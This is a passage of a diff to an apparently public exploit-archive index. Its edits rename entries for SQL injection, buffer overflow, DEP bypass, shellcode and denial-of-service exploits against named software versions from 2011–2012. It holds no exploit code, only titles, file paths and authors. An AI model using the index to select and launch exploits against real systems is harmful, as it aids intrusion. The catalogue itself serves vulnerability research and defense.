Overflow",2011-07-07,Metasploit,windows,local,0 -17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0 +17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure",2011-07-07,@ygoltsev,jsp,webapps,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote,0 39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - SEH Overflow (Metasploit)",2016-04-05,Metasploit,windows,remote,80 39662,platforms/windows/remote/39662.rb,"PCMAN FTP Server Buffer Overflow - PUT Command",2016-04-05,Metasploit,windows,remote,21 @@ -15264,7 +15265,7 @@ id,file,description,date,author,platform,type,port 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 KisKrnl.sys 2011.7.8.913 - Local Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0 17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 -17564,platforms/osx/shellcode/17564.asm,"OS-X - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0 +17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0 17567,platforms/osx/dos/17567.txt,"Safari 5.0.6/5.1 - SVG DOM Processing (PoC)",2011-07-25,"Nikita Tarakanov",osx,dos,0 @@ -15318,7 +15319,7 @@ id,file,description,date,author,platform,type,port 17630,platforms/php/webapps/17630.txt,"AChecker 1.2 - Multiple Error-Based SQL Injection Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 17631,platforms/php/webapps/17631.txt,"atutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 17633,platforms/php/webapps/17633.txt,"Cart Software - Multiple Vulnerabilities",2011-08-06,hosinn,php,webapps,0 -17634,platforms/windows/local/17634.pl,"Free CD to MP3 Converter 3.1 - Universal DEP Bypass Exploit",2011-08-07,"C4SS!0 G0M3S",windows,local,0 +17634,platforms/windows/local/17634.pl,"Free CD to MP3 Converter 3.1 - Universal DEP Bypass",2011-08-07,"C4SS!0 G0M3S",windows,local,0 17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL - Interface Universal Directory Traversal (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0 17636,platforms/hardware/remote/17636.rb,"HP JetDirect PJL - Query Execution (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0 17638,platforms/windows/dos/17638.py,"LiteServe 2.81 - PASV Command Denial of Service",2011-08-08,"Craig Freyman",windows,dos,0 @@ -15330,14 +15331,14 @@ id,file,description,date,author,platform,type,port 17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (2)",2011-08-09,pentesters.ir,php,webapps,0 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote,0 17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search - SQL Injection",2011-08-09,NoGe,php,webapps,0 -17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0 +17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass",2011-08-10,"C4SS!0 G0M3S",windows,local,0 17648,platforms/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Root Shell",2011-08-10,SZ,linux,remote,0 17649,platforms/windows/remote/17649.py,"BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote,0 17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (1)",2011-08-10,Metasploit,windows,remote,0 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 - DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 -17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0 +17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass",2011-08-11,"C4SS!0 G0M3S",windows,local,0 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,Metasploit,windows,remote,0 -17665,platforms/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 - DEP Bypass Exploit",2011-08-13,"C4SS!0 G0M3S",windows,local,0 +17665,platforms/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 - DEP Bypass",2011-08-13,"C4SS!0 G0M3S",windows,local,0 17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 - Denial of Servive Exploit",2011-08-12,G13,windows,dos,0 17666,platforms/php/webapps/17666.txt,"Prediction Football 2.51 - XRF / Cross-Site Request Forgery",2011-08-14,"Smith Falcon",php,webapps,0 17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,Metasploit,windows,remote,0 @@ -15375,7 +15376,7 @@ id,file,description,date,author,platform,type,port 17698,platforms/php/webapps/17698.rb,"Oracle Secure Backup - Authentication Bypass/Command Injection",2011-08-19,Metasploit,php,webapps,0 17699,platforms/windows/remote/17699.rb,"Symantec System Center Alert Management System - 'xfr.exe' Arbitrary Command Execution",2011-08-19,Metasploit,windows,remote,0 17700,platforms/windows/remote/17700.rb,"Symantec System Center Alert Management System - 'hndlrsvc.exe' Arbitrary Command Execution",2011-08-19,Metasploit,windows,remote,0 -17702,platforms/php/webapps/17702.rb,"WordPress Block-Spam-By-Math-Reloaded Plugin - Bypass",2011-08-20,"Tiago Ferreira and Heyder Andrade",php,webapps,0 +17702,platforms/php/webapps/17702.rb,"WordPress Block-Spam-By-Math-Reloaded Plugin - Bypass Exploit",2011-08-20,"Tiago Ferreira and Heyder Andrade",php,webapps,0 17703,platforms/php/webapps/17703.txt,"Axis Commerce (E-Commerce System) - Persistent Cross-Site Scripting",2011-08-20,"Eyup CELIK",php,webapps,0 17704,platforms/php/webapps/17704.txt,"WordPress UnGallery plugin 1.5.8 - Local File Disclosure",2011-08-20,"Miroslav Stampar",php,webapps,0 17705,platforms/php/webapps/17705.txt,"EasySiteEdit - Remote File Inclusion",2011-08-21,"koskesh jakesh",php,webapps,0 @@ -15388,7 +15389,7 @@ id,file,description,date,author,platform,type,port 17712,platforms/windows/dos/17712.txt,"Adobe Photoshop CS5 - '.gif' Remote Code Execution",2011-08-22,"Francis Provencher",windows,dos,0 17713,platforms/jsp/webapps/17713.txt,"ManageEngine ServiceDesk Plus 8.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-08-23,LiquidWorm,jsp,webapps,0 17714,platforms/php/webapps/17714.txt,"Help Desk Software 1.1g - Cross-Site Request Forgery (add admin)",2011-08-24,G13,php,webapps,0 -17715,platforms/windows/local/17715.html,"F-Secure Multiple Products - ActiveX SEH Overwrite (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0 +17715,platforms/windows/local/17715.html,"F-Secure Multiple Products - ActiveX Overwrite (SEH) (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0 17716,platforms/php/webapps/17716.txt,"WordPress SendIt plugin 1.5.9 - Blind SQL Injection",2011-08-25,evilsocket,php,webapps,0 17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - '.m3u' Local Buffer Overflow (PoC)",2011-08-26,"D3r K0n!G",windows,dos,0 17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass",2011-08-26,Metasploit,windows,remote,0 @@ -15402,7 +15403,7 @@ id,file,description,date,author,platform,type,port 17729,platforms/php/webapps/17729.txt,"WordPress Collision Testimonials plugin 3.0 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 17730,platforms/php/webapps/17730.txt,"WordPress oQey Headers plugin 0.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 17731,platforms/php/webapps/17731.txt,"WordPress Photoracer Plugin 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0 -17732,platforms/windows/local/17732.py,"Free MP3 CD Ripper 1.1 - DEP Bypass Exploit",2011-08-27,"C4SS!0 G0M3S",windows,local,0 +17732,platforms/windows/local/17732.py,"Free MP3 CD Ripper 1.1 - DEP Bypass",2011-08-27,"C4SS!0 G0M3S",windows,local,0 17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro 1.1.0 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",asp,webapps,0 17734,platforms/php/webapps/17734.txt,"JCE Joomla Extension 2.0.10 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",php,webapps,0 17735,platforms/windows/local/17735.pl,"Yahoo! player 1.5 - '.m3u' Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0 @@ -15451,7 +15452,7 @@ id,file,description,date,author,platform,type,port 17783,platforms/windows/local/17783.pl,"ZipX 1.71 - '.ZIP' File Buffer Overflow",2011-09-05,"C4SS!0 G0M3S",windows,local,0 17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String Denial of Service (TOWeb.MO file Corruption)",2011-09-05,"BSOD Digital",windows,dos,0 17786,platforms/php/webapps/17786.txt,"Webmobo WB News System - Blind SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0 -17788,platforms/windows/local/17788.py,"DVD X Player 5.5 Pro - SEH Overwrite",2011-09-06,blake,windows,local,0 +17788,platforms/windows/local/17788.py,"DVD X Player 5.5 Pro - Overwrite (SEH)",2011-09-06,blake,windows,local,0 17789,platforms/php/webapps/17789.txt,"WordPress Tweet Old Post plugin 3.2.5 - SQL Injection",2011-09-06,sherl0ck_,php,webapps,0 17790,platforms/php/webapps/17790.txt,"WordPress post highlights plugin 2.2 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 17791,platforms/php/webapps/17791.txt,"WordPress KNR Author List Widget plugin 2.0.0 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 @@ -15463,7 +15464,7 @@ id,file,description,date,author,platform,type,port 17797,platforms/php/webapps/17797.txt,"WordPress Paid Downloads plugin 2.01 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 17798,platforms/php/webapps/17798.txt,"WordPress Community Events plugin 1.2.1 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 17800,platforms/php/webapps/17800.txt,"AM4SS 1.2 - Cross-Site Request Forgery (add admin)",2011-09-08,"red virus",php,webapps,0 -17801,platforms/php/webapps/17801.rb,"WordPress 1 Flash Gallery 1.30 < 1.5.7a Plugin - Arbitrary File Upload Exploit (Metasploit)",2011-09-08,"Ben Schmidt",php,webapps,0 +17801,platforms/php/webapps/17801.rb,"WordPress 1 Flash Gallery 1.30 < 1.5.7a Plugin - Arbitrary File Upload (Metasploit)",2011-09-08,"Ben Schmidt",php,webapps,0 17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit",2011-09-08,Rew,windows,local,0 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos,0 21787,platforms/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0 @@ -15537,7 +15538,7 @@ id,file,description,date,author,platform,type,port 17878,platforms/windows/dos/17878.txt,"EViews 7.0.0.1 - (aka 7.2) Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 17879,platforms/windows/dos/17879.txt,"MetaServer RT 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 17880,platforms/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO",2011-09-20,Metasploit,windows,local,0 -17882,platforms/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Arbitrary File Upload Exploit",2011-09-22,EgiX,php,webapps,0 +17882,platforms/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Arbitrary File Upload",2011-09-22,EgiX,php,webapps,0 17883,platforms/hardware/remote/17883.txt,"Blue Coat Reporter - Unauthenticated Directory Traversal",2011-09-22,nitr0us,hardware,remote,0 17884,platforms/windows/remote/17884.py,"Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow",2011-09-22,mr_me,windows,remote,0 17885,platforms/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0 @@ -15555,7 +15556,7 @@ id,file,description,date,author,platform,type,port 17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System - SQL Injection",2011-09-27,"Indonesian BlackCoder",php,webapps,0 -17901,platforms/osx/dos/17901.c,"Apple Mac OS X < 10.6.7 - Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 +17901,platforms/osx/dos/17901.c,"Apple Mac OSX < 10.6.7 - Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - 'nprosec.sys' Privilege Escalation",2011-09-28,Xst3nZ,windows,local,0 17903,platforms/windows/dos/17903.txt,"NCSS 07.1.21 - Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0 @@ -15593,7 +15594,7 @@ id,file,description,date,author,platform,type,port 17946,platforms/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,php,webapps,0 17947,platforms/php/webapps/17947.rb,"Snortreport - nmap.php and nbtscan.php Remote Command Execution",2011-10-09,Metasploit,php,webapps,0 17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (2)",2011-10-09,Metasploit,windows,remote,0 -17949,platforms/php/webapps/17949.rb,"MyBB 1.6.4 - Backdoor Exploit",2011-10-09,Metasploit,php,webapps,0 +17949,platforms/php/webapps/17949.rb,"MyBB 1.6.4 - Backdoor",2011-10-09,Metasploit,php,webapps,0 17950,platforms/php/webapps/17950.txt,"GotoCode Online Classifieds - Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",php,webapps,0 17951,platforms/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection Vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps,0 17952,platforms/php/webapps/17952.txt,"KaiBB 2.0.1 - SQL Injection",2011-10-10,"Stefan Schurtz",php,webapps,0 @@ -15630,7 +15631,7 @@ id,file,description,date,author,platform,type,port 17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit - libxslt Arbitrary File Creation",2011-10-18,Metasploit,windows,remote,0 17994,platforms/php/webapps/17994.php,"Dolphin 7.0.7 - (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game - Persistent Cross-Site Scripting",2011-10-17,M.Jock3R,php,webapps,0 -17992,platforms/php/webapps/17992.txt,"Gnuboard 4.33.02 - tp.php PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0 +17992,platforms/php/webapps/17992.txt,"GNUBoard 4.33.02 - tp.php PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0 17995,platforms/php/webapps/17995.txt,"NoNumber Framework Joomla! Plugin - Multiple Vulnerabilities",2011-10-18,jdc,php,webapps,0 17996,platforms/linux_mips/shellcode/17996.c,"Linux/MIPS - XOR Shellcode Encoder (60 bytes)",2011-10-18,entropy,linux_mips,shellcode,0 17997,platforms/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection / Cross-Site Scripting",2011-10-19,"Stefan Schurtz",php,webapps,0 @@ -15657,10 +15658,10 @@ id,file,description,date,author,platform,type,port 18019,platforms/windows/dos/18019.txt,"Google Chrome - Killing Thread (PoC)",2011-10-22,pigtail23,windows,dos,0 18020,platforms/php/webapps/18020.txt,"Jara 1.6 - SQL Injection",2011-10-23,muuratsalo,php,webapps,0 18021,platforms/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (1)",2011-10-23,EgiX,php,webapps,0 -18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 +18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - Denial of Service",2011-10-23,Alguien,php,dos,0 18024,platforms/windows/dos/18024.txt,"Win32k - Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0 -18025,platforms/multiple/dos/18025.txt,"Google Chrome - Denial of Service (Denial of Service)",2011-10-23,"Prashant Uniyal",multiple,dos,0 +18025,platforms/multiple/dos/18025.txt,"Google Chrome - Denial of Service",2011-10-23,"Prashant Uniyal",multiple,dos,0 18042,platforms/php/webapps/18042.txt,"Techfolio 1.0 Joomla Component - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0 18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 (build 237) - Denial of Service (PoC)",2011-10-28,loneferret,windows,dos,0 40298,platforms/windows/dos/40298.py,"Goron WebServer 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",windows,dos,80 @@ -15704,7 +15705,7 @@ id,file,description,date,author,platform,type,port 18076,platforms/php/webapps/18076.txt,"Advanced Poll 2.02 - SQL Injection",2011-11-04,"Yassin Aboukir",php,webapps,0 18077,platforms/windows/webapps/18077.txt,"HP Data Protector Media Operations 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0 18078,platforms/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 - Use-After-Free",2011-11-04,"Luigi Auriemma",windows,dos,0 -18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure Exploit",2011-11-04,"Todor Donev",hardware,remote,0 +18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0 18080,platforms/linux/local/18080.c,"Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak Exploit",2011-11-04,"Todor Donev",linux,local,0 18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x - (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0 18082,platforms/windows/local/18082.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (3)",2011-11-04,Metasploit,windows,local,0 @@ -15745,7 +15746,7 @@ id,file,description,date,author,platform,type,port 18121,platforms/php/webapps/18121.txt,"FreeWebShop 2.2.9 R2 - (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN - SQL Injection",2011-11-16,"Asheesh kumar",hardware,webapps,0 18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control",2011-11-17,Metasploit,windows,remote,0 -18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow / Denial of Service Exploit",2011-11-18,hellok,windows,dos,0 +18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow / Denial of Service",2011-11-18,hellok,windows,dos,0 18125,platforms/windows/remote/18125.rb,"Wireshark - console.lua pre-loading",2011-11-19,Metasploit,windows,remote,0 18126,platforms/php/webapps/18126.txt,"WordPress jetpack Plugin - 'sharedaddy.php' ID SQL Injection",2011-11-19,longrifle0x,php,webapps,0 18127,platforms/php/webapps/18127.txt,"Freelancer Calendar 1.01 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 @@ -15815,7 +15816,7 @@ id,file,description,date,author,platform,type,port 18221,platforms/linux/dos/18221.c,"Apache HTTP Server - Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,php,webapps,0 18223,platforms/windows/dos/18223.pl,"Free Opener - Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos,0 -18224,platforms/php/webapps/18224.php,"Docebo Lms 4.0.4 - (messages) Remote Code Execution",2011-12-09,mr_me,php,webapps,0 +18224,platforms/php/webapps/18224.php,"Docebo Lms 4.0.4 - (Messages) Remote Code Execution",2011-12-09,mr_me,php,webapps,0 18225,platforms/linux/dos/18225.c,"CSF Firewall - Buffer Overflow",2011-12-09,"FoX HaCkEr",linux,dos,0 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - connect back Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 @@ -15846,10 +15847,10 @@ id,file,description,date,author,platform,type,port 18268,platforms/windows/dos/18268.txt,"FreeSSHd - Crash (PoC)",2011-12-24,Level,windows,dos,0 18265,platforms/php/webapps/18265.txt,"Tiki Wiki CMS Groupware 8.2 - (snarf_ajax.php) Remote PHP Code Injection",2011-12-22,EgiX,php,webapps,0 18266,platforms/php/webapps/18266.py,"Open Conference/Journal/Harvester Systems 2.3.x - Multiple Remote Code Execution Vulnerabilities",2011-12-23,mr_me,php,webapps,0 -18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 +18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service",2011-12-24,Level,windows,dos,0 18270,platforms/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,windows,dos,0 -18271,platforms/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 -18272,platforms/windows/dos/18272.py,"Microsoft Windows Explorer - Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 +18271,platforms/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service",2011-12-24,Level,windows,dos,0 +18272,platforms/windows/dos/18272.py,"Microsoft Windows Explorer - Denial of Service",2011-12-24,Level,windows,dos,0 18274,platforms/php/webapps/18274.txt,"openemr 4 - Multiple Vulnerabilities",2011-12-25,Level,php,webapps,0 18275,platforms/win_x86-64/dos/18275.txt,"Safari - GdiDrawStream BSoD",2011-12-18,webDEViL,win_x86-64,dos,0 18276,platforms/php/webapps/18276.txt,"WordPress Mailing List Plugin - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0 @@ -15943,7 +15944,7 @@ id,file,description,date,author,platform,type,port 18389,platforms/php/webapps/18389.txt,"Drupal CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting",2012-01-19,MaXe,php,webapps,0 18390,platforms/php/webapps/18390.txt,"WordPress Plugin ucan post 1.0.09 - Persistent Cross-Site Scripting",2012-01-19,"Gianluca Brindisi",php,webapps,0 18700,platforms/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 -18392,platforms/php/webapps/18392.php,"appRain CMF 0.1.5 - (Uploadify.php) Unrestricted File Upload Exploit",2012-01-19,EgiX,php,webapps,0 +18392,platforms/php/webapps/18392.php,"appRain CMF 0.1.5 - (Uploadify.php) Unrestricted Arbitrary File Upload",2012-01-19,EgiX,php,webapps,0 18393,platforms/linux/remote/18393.rb,"Gitorious - Arbitrary Command Execution",2012-01-20,Metasploit,linux,remote,0 18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance - Authentication Bypass",2012-01-20,v3n0m,asp,webapps,0 18395,platforms/asp/webapps/18395.txt,"EasyPage - SQL Injection",2012-01-20,"Red Security TEAM",asp,webapps,0 @@ -16000,7 +16001,7 @@ id,file,description,date,author,platform,type,port 18456,platforms/php/webapps/18456.txt,"Achievo 1.4.3 - Multiple Web Vulnerabilities",2012-02-02,Vulnerability-Lab,php,webapps,0 18457,platforms/linux/dos/18457.py,"torrent-stats - httpd.c Denial of Service",2012-02-03,otr,linux,dos,0 18458,platforms/php/dos/18458.txt,"PHP 5.4SVN-2012-02-03 - htmlspecialchars/entities Buffer Overflow",2012-02-03,cataphract,php,dos,0 -18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (64-bit) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0 +18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (x64t) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0 18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow Denial of Service",2012-02-04,"Senator of Pirates",windows,dos,0 18463,platforms/windows/dos/18463.html,"PDF Viewer Component - ActiveX Denial of Service",2012-02-05,"Senator of Pirates",windows,dos,0 18464,platforms/php/webapps/18464.html,"GAzie 5.20 - Cross-Site Request Forgery",2012-02-05,"Giuseppe D'Inverno",php,webapps,0 @@ -16011,7 +16012,7 @@ id,file,description,date,author,platform,type,port 18469,platforms/windows/dos/18469.pl,"Typsoft FTP Server 1.10 - Multiple Commands Denial of Service",2012-02-07,"Balazs Makany",windows,dos,0 18470,platforms/php/webapps/18470.txt,"Ananta Gazelle CMS - Update Statement SQL Injection",2012-02-08,hackme,php,webapps,0 18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0 -18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Include",2012-02-08,Vulnerability-Lab,multiple,webapps,0 +18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Inclusion",2012-02-08,Vulnerability-Lab,multiple,webapps,0 18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 - BSOD",2012-02-09,shinnai,windows,dos,0 18476,platforms/windows/remote/18476.py,"Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow",2012-02-10,Metasploit,windows,remote,0 @@ -16032,7 +16033,7 @@ id,file,description,date,author,platform,type,port 18495,platforms/php/webapps/18495.html,"almnzm 2.4 - Cross-Site Request Forgery (Add Admin)",2012-02-18,"HaNniBaL KsA",php,webapps,0 18497,platforms/php/webapps/18497.txt,"4PSA CMS - SQL Injection",2012-02-19,"BHG Security Center",php,webapps,0 18498,platforms/php/webapps/18498.html,"SyndeoCMS 3.0 - Cross-Site Request Forgery",2012-02-19,"Ivano Binetti",php,webapps,0 -18500,platforms/windows/local/18500.py,"Blade API Monitor - Unicode Bypass (Serial Number Buffer Overflow)",2012-02-20,b33f,windows,local,0 +18500,platforms/windows/local/18500.py,"Blade API Monitor - Unicode Bypass (Serial Number) Buffer Overflow",2012-02-20,b33f,windows,local,0 18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0 18502,platforms/php/webapps/18502.html,"PlumeCMS 1.2.4 - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",php,webapps,0 18503,platforms/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS - Cross-Site Request Forgery (Change Admin Password)",2012-02-21,"Ivano Binetti",hardware,webapps,0 @@ -16053,9 +16054,9 @@ id,file,description,date,author,platform,type,port 18516,platforms/php/webapps/18516.txt,"phpDenora 1.4.6 - Multiple SQL Injections",2012-02-23,NLSecurity,php,webapps,0 18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",hardware,webapps,0 18519,platforms/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,php,webapps,0 -18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 - (English/Italian) Remote File Upload Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",php,webapps,0 +18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 - (English/Italian) Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-02-23,"Danny 